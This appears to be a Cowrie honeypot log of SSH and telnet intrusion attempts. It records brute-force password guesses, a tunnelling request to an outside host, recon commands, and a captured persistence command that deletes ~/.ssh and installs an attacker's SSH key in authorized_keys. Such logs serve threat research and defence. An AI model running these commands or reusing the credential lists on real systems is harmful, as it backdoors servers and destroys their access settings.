{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50940,"dst_ip":"1.2.3.4","dst_port":23,"session":"06dd6687419b","protocol":"telnet","message":"New connection: 212.227.235.229:50940 (1.2.3.4:23) [session: 06dd6687419b]","sensor":"my-vps","timestamp":"2025-08-28T19:50:31.134637Z"}
{"eventid":"cowrie.session.closed","duration":31.368561267852783,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-28T19:51:02.503128Z","src_ip":"212.227.235.229","session":"06dd6687419b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52936,"dst_ip":"1.2.3.4","dst_port":23,"session":"5799031831ba","protocol":"telnet","message":"New connection: 212.227.235.229:52936 (1.2.3.4:23) [session: 5799031831ba]","sensor":"my-vps","timestamp":"2025-08-28T19:51:05.690774Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":1818,"dst_ip":"1.2.3.4","dst_port":22,"session":"1cc6ba5a8180","protocol":"ssh","message":"New connection: 212.227.125.160:1818 (1.2.3.4:22) [session: 1cc6ba5a8180]","sensor":"my-vps","timestamp":"2025-08-28T19:51:22.318433Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T19:51:22.319659Z","src_ip":"212.227.125.160","session":"1cc6ba5a8180"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T19:51:22.402686Z","src_ip":"212.227.125.160","session":"1cc6ba5a8180"}
{"eventid":"cowrie.login.failed","username":"ubnt","password":"ubnt12345","message":"login attempt [ubnt/ubnt12345] failed","sensor":"my-vps","timestamp":"2025-08-28T19:51:22.811043Z","src_ip":"212.227.125.160","session":"1cc6ba5a8180"}
{"eventid":"cowrie.login.failed","username":"ubnt","password":"ubnt@123","message":"login attempt [ubnt/ubnt@123] failed","sensor":"my-vps","timestamp":"2025-08-28T19:51:23.909114Z","src_ip":"212.227.125.160","session":"1cc6ba5a8180"}
{"eventid":"cowrie.login.failed","username":"ubnt","password":"q1w2e3r4t5","message":"login attempt [ubnt/q1w2e3r4t5] failed","sensor":"my-vps","timestamp":"2025-08-28T19:51:24.992780Z","src_ip":"212.227.125.160","session":"1cc6ba5a8180"}
{"eventid":"cowrie.login.failed","username":"ubnt","password":"admin1","message":"login attempt [ubnt/admin1] failed","sensor":"my-vps","timestamp":"2025-08-28T19:51:26.085082Z","src_ip":"212.227.125.160","session":"1cc6ba5a8180"}
{"eventid":"cowrie.login.failed","username":"ubnt","password":"123456","message":"login attempt [ubnt/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T19:51:27.169196Z","src_ip":"212.227.125.160","session":"1cc6ba5a8180"}
{"eventid":"cowrie.session.closed","duration":"5.9","message":"Connection lost after 5.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T19:51:28.253209Z","src_ip":"212.227.125.160","session":"1cc6ba5a8180"}
{"eventid":"cowrie.session.closed","duration":30.64660120010376,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-28T19:51:36.337309Z","src_ip":"212.227.235.229","session":"5799031831ba"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46492,"dst_ip":"1.2.3.4","dst_port":23,"session":"e7c8eff2d1fa","protocol":"telnet","message":"New connection: 212.227.235.229:46492 (1.2.3.4:23) [session: e7c8eff2d1fa]","sensor":"my-vps","timestamp":"2025-08-28T19:52:03.396897Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":41301,"dst_ip":"1.2.3.4","dst_port":22,"session":"258a972facb1","protocol":"ssh","message":"New connection: 212.227.125.160:41301 (1.2.3.4:22) [session: 258a972facb1]","sensor":"my-vps","timestamp":"2025-08-28T19:52:21.614056Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T19:52:21.617068Z","src_ip":"212.227.125.160","session":"258a972facb1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":41592,"dst_ip":"1.2.3.4","dst_port":22,"session":"bbd627fc9ac5","protocol":"ssh","message":"New connection: 212.227.125.160:41592 (1.2.3.4:22) [session: bbd627fc9ac5]","sensor":"my-vps","timestamp":"2025-08-28T19:52:21.729896Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T19:52:21.730814Z","src_ip":"212.227.125.160","session":"bbd627fc9ac5"}
{"eventid":"cowrie.client.kex","hassh":"6a77bbd6ef48d6a9959a47aa4a42a505","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 6a77bbd6ef48d6a9959a47aa4a42a505","sensor":"my-vps","timestamp":"2025-08-28T19:52:21.845838Z","src_ip":"212.227.125.160","session":"bbd627fc9ac5"}
{"eventid":"cowrie.login.success","username":"root","password":"broadguam1","message":"login attempt [root/broadguam1] succeeded","sensor":"my-vps","timestamp":"2025-08-28T19:52:22.192802Z","src_ip":"212.227.125.160","session":"bbd627fc9ac5"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"178.20.45.148","dst_port":80,"src_ip":"212.227.125.160","src_port":0,"message":"direct-tcp connection request to 178.20.45.148:80 from 0.0.0.0:0","sensor":"my-vps","timestamp":"2025-08-28T19:52:22.309059Z","session":"bbd627fc9ac5"}
{"eventid":"cowrie.session.closed","duration":46.736297369003296,"message":"Connection lost after 46 seconds","sensor":"my-vps","timestamp":"2025-08-28T19:52:50.133120Z","src_ip":"212.227.235.229","session":"e7c8eff2d1fa"}
{"eventid":"cowrie.session.closed","duration":"70.0","message":"Connection lost after 70.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T19:53:31.732237Z","src_ip":"212.227.125.160","session":"bbd627fc9ac5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":25849,"dst_ip":"1.2.3.4","dst_port":22,"session":"3770daf5f8ec","protocol":"ssh","message":"New connection: 212.227.235.229:25849 (1.2.3.4:22) [session: 3770daf5f8ec]","sensor":"my-vps","timestamp":"2025-08-28T19:54:39.666434Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T19:54:39.667522Z","src_ip":"212.227.235.229","session":"3770daf5f8ec"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T19:54:39.940730Z","src_ip":"212.227.235.229","session":"3770daf5f8ec"}
{"eventid":"cowrie.login.success","username":"root","password":"102699","message":"login attempt [root/102699] succeeded","sensor":"my-vps","timestamp":"2025-08-28T19:54:40.772889Z","src_ip":"212.227.235.229","session":"3770daf5f8ec"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T19:54:41.691416Z","src_ip":"212.227.235.229","session":"3770daf5f8ec"}
{"eventid":"cowrie.command.input","input":"env | head -10","message":"CMD: env | head -10","sensor":"my-vps","timestamp":"2025-08-28T19:54:41.692094Z","src_ip":"212.227.235.229","session":"3770daf5f8ec"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/54b13bf37f0f1c6d20bb831acb4d4856be1e90f0be7953c3660ae0d32d775d3b","size":28,"shasum":"54b13bf37f0f1c6d20bb831acb4d4856be1e90f0be7953c3660ae0d32d775d3b","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/54b13bf37f0f1c6d20bb831acb4d4856be1e90f0be7953c3660ae0d32d775d3b after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T19:54:42.015233Z","src_ip":"212.227.235.229","session":"3770daf5f8ec"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T19:54:42.061790Z","src_ip":"212.227.235.229","session":"3770daf5f8ec"}
{"eventid":"cowrie.session.connect","src_ip":"80.94.95.15","src_port":33366,"dst_ip":"1.2.3.4","dst_port":22,"session":"e222279d9c9c","protocol":"ssh","message":"New connection: 80.94.95.15:33366 (1.2.3.4:22) [session: e222279d9c9c]","sensor":"my-vps","timestamp":"2025-08-28T19:54:54.108112Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T19:54:54.109159Z","src_ip":"80.94.95.15","session":"e222279d9c9c"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T19:54:54.160424Z","src_ip":"80.94.95.15","session":"e222279d9c9c"}
{"eventid":"cowrie.login.failed","username":"testuser","password":"testuser","message":"login attempt [testuser/testuser] failed","sensor":"my-vps","timestamp":"2025-08-28T19:54:54.456806Z","src_ip":"80.94.95.15","session":"e222279d9c9c"}
{"eventid":"cowrie.login.failed","username":"testuser","password":"abc123","message":"login attempt [testuser/abc123] failed","sensor":"my-vps","timestamp":"2025-08-28T19:54:55.511035Z","src_ip":"80.94.95.15","session":"e222279d9c9c"}
{"eventid":"cowrie.login.failed","username":"testuser","password":"abcd123","message":"login attempt [testuser/abcd123] failed","sensor":"my-vps","timestamp":"2025-08-28T19:54:56.570051Z","src_ip":"80.94.95.15","session":"e222279d9c9c"}
{"eventid":"cowrie.login.failed","username":"testuser","password":"abcd1234","message":"login attempt [testuser/abcd1234] failed","sensor":"my-vps","timestamp":"2025-08-28T19:54:57.623897Z","src_ip":"80.94.95.15","session":"e222279d9c9c"}
{"eventid":"cowrie.login.failed","username":"testuser","password":"abc1234","message":"login attempt [testuser/abc1234] failed","sensor":"my-vps","timestamp":"2025-08-28T19:54:58.677359Z","src_ip":"80.94.95.15","session":"e222279d9c9c"}
{"eventid":"cowrie.session.closed","duration":"5.6","message":"Connection lost after 5.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T19:54:59.735308Z","src_ip":"80.94.95.15","session":"e222279d9c9c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55576,"dst_ip":"1.2.3.4","dst_port":22,"session":"8a5ec2a96adf","protocol":"ssh","message":"New connection: 212.227.235.229:55576 (1.2.3.4:22) [session: 8a5ec2a96adf]","sensor":"my-vps","timestamp":"2025-08-28T19:55:12.121519Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T19:55:12.122310Z","src_ip":"212.227.235.229","session":"8a5ec2a96adf"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T19:55:12.293702Z","src_ip":"212.227.235.229","session":"8a5ec2a96adf"}
{"eventid":"cowrie.login.success","username":"root","password":"@123456","message":"login attempt [root/@123456] succeeded","sensor":"my-vps","timestamp":"2025-08-28T19:55:13.019040Z","src_ip":"212.227.235.229","session":"8a5ec2a96adf"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T19:55:13.378952Z","src_ip":"212.227.235.229","session":"8a5ec2a96adf"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T19:55:13.379717Z","src_ip":"212.227.235.229","session":"8a5ec2a96adf"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T19:55:13.381136Z","src_ip":"212.227.235.229","session":"8a5ec2a96adf"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T19:55:13.553622Z","src_ip":"212.227.235.229","session":"8a5ec2a96adf"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T19:55:14.342342Z","src_ip":"212.227.235.229","session":"8a5ec2a96adf"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-28T19:55:14.343171Z","src_ip":"212.227.235.229","session":"8a5ec2a96adf"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-28T19:55:14.517694Z","src_ip":"212.227.235.229","session":"8a5ec2a96adf"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T19:55:14.518747Z","src_ip":"212.227.235.229","session":"8a5ec2a96adf"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55588,"dst_ip":"1.2.3.4","dst_port":22,"session":"d2ba8cb1d1b3","protocol":"ssh","message":"New connection: 212.227.235.229:55588 (1.2.3.4:22) [session: d2ba8cb1d1b3]","sensor":"my-vps","timestamp":"2025-08-28T19:55:14.702134Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T19:55:14.703131Z","src_ip":"212.227.235.229","session":"d2ba8cb1d1b3"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T19:55:14.882047Z","src_ip":"212.227.235.229","session":"d2ba8cb1d1b3"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-28T19:55:15.639034Z","src_ip":"212.227.235.229","session":"d2ba8cb1d1b3"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T19:55:16.820548Z","src_ip":"212.227.235.229","session":"d2ba8cb1d1b3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55598,"dst_ip":"1.2.3.4","dst_port":22,"session":"c72e067fe4bd","protocol":"ssh","message":"New connection: 212.227.235.229:55598 (1.2.3.4:22) [session: c72e067fe4bd]","sensor":"my-vps","timestamp":"2025-08-28T19:55:16.988476Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T19:55:16.989390Z","src_ip":"212.227.235.229","session":"c72e067fe4bd"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T19:55:17.163111Z","src_ip":"212.227.235.229","session":"c72e067fe4bd"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-28T19:55:17.902886Z","src_ip":"212.227.235.229","session":"c72e067fe4bd"}
